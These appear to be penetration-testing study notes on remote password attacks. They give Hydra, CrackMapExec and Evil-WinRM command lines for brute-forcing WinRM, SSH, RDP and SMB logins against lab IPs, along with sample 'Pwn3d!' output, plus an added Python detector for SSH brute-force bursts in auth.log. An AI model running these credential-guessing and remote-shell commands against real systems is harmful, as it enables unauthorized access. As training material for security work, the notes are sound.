Remote Password Attacks

Network Services

  • The most common services suitable for this are RDP, WinRM, and SSH.
  • SSH is now much less common on Windows, but is the leading remote-access service on Linux.

WinRM

  • Must be enabled and configured manually by the administrator
  • Ports 5985 (HTTP) and 5986 (HTTPS)
  • https://github.com/byt3bl33d3r/CrackMapExec
  • CrackMapExec also supports SMB, LDAP, MSSQL, and more

CrackMapExec

  • crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
  • eg:
    $ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

    WINRM       10.129.42.197   5985   NONE    [*] None (name:10.129.42.197) (domain:None)
    WINRM       10.129.42.197   5985   NONE    [*] http://10.129.42.197:5985/wsman
    WINRM       10.129.42.197   5985   NONE    [+] None\user:password (Pwn3d!)
  • Prints Pwn3d! when a valid username/password pair is found

Evil-WinRM

  • evil-winrm -i <target-IP> -u <username> -p <password>
  • eg: evil-winrm -i 10.129.42.197 -u user -p password
  • This establishes a PowerShell session on the target

SSH

  • TCP port 22
  • SSH uses three kinds of cryptography: symmetric encryption, asymmetric encryption, and hashing
  • Symmetric: the same key is used for encryption and decryption
  • Diffie-Hellman (key exchange)
  • Symmetric ciphers: AES, 3DES, Blowfish
  • Asymmetric: uses a private and a public key
  • If the private key is obtained, it can be used to log in to the system
  • Hashing: SSH uses hashing to confirm the authenticity (integrity) of messages

For Hydra, add -t 48 to use 48 parallel threads for the attack

  • https://www.hackingarticles.in/a-detailed-guide-on-hydra/

Hydra - SSH

  • Brute force SSH using Hydra
  • hydra -L user.list -P password.list ssh://10.129.x.x
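What a Hydra run like this looks like from the target's side, as an added defender's example (not part of these notes): a small detector over constructed sshd auth.log lines that flags any source IP reaching a failure threshold inside a time window, and notes whether a successful login from that source followed the burst. The log lines, the source addresses, and the assumed year (syslog timestamps carry none) are all constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines in auth.log format (not from a real host):
# a burst of failures from one source, then normal activity from another.
SAMPLE_LOG = """\
Mar  3 10:15:01 srv sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 50234 ssh2
Mar  3 10:15:02 srv sshd[2102]: Failed password for invalid user test from 203.0.113.5 port 50235 ssh2
Mar  3 10:15:02 srv sshd[2103]: Failed password for root from 203.0.113.5 port 50236 ssh2
Mar  3 10:15:03 srv sshd[2104]: Failed password for bob from 203.0.113.5 port 50237 ssh2
Mar  3 10:15:04 srv sshd[2105]: Failed password for alice from 203.0.113.5 port 50238 ssh2
Mar  3 10:15:05 srv sshd[2106]: Accepted password for alice from 203.0.113.5 port 50239 ssh2
Mar  3 10:20:00 srv sshd[2107]: Failed password for alice from 198.51.100.7 port 41000 ssh2
Mar  3 10:20:10 srv sshd[2108]: Accepted publickey for alice from 198.51.100.7 port 41001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)

def parse(line, year=2024):
    """Parse one sshd line into (timestamp, result, user, source IP); None if not an auth event."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Assumed year: syslog lines do not carry one.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return {src: (total failures, distinct users tried, success after the burst)}
    for every source with at least `threshold` failed logins inside any `window_s` span."""
    by_src = defaultdict(list)
    for ev in filter(None, map(parse, log_text.splitlines())):
        by_src[ev[3]].append(ev[:3])
    hits = {}
    for src, evs in by_src.items():
        fails = [(ts, u) for ts, r, u in evs if r == "Failed"]  # log order == time order
        for i in range(len(fails) - threshold + 1):
            first_ts, last_ts = fails[i][0], fails[i + threshold - 1][0]
            if (last_ts - first_ts).total_seconds() <= window_s:
                success_after = any(r == "Accepted" and ts > last_ts for ts, r, _ in evs)
                hits[src] = (len(fails), len({u for _, u in fails}), success_after)
                break
    return hits
```

Many distinct usernames from one source in a short span is the signature of a wordlist run; a success right after the burst is the event worth paging on.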

RDP

  • Port 3389
  • Hydra can be used for RDP brute forcing as well
  • hydra -L user.list -P password.list rdp://10.x.x.x

SMB

  • Server Message Block (SMB) transfers data between clients and servers in a local network.
  • Provides file and directory sharing and printing services
  • Also known as the Common Internet File System (CIFS)
  • Samba is the SMB implementation on Linux

SMB Password Cracking

  • hydra -L user.list -P password.list smb://10.x.x.x

ISSUE

  • You can get an "invalid reply" error if the Hydra version is outdated and does not support SMBv3

SOLUTION

  • Manually update Hydra
  • Alternatively, use the Metasploit module auxiliary/scanner/smb/smb_login in msfconsole

SMB Share Enum

  • crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares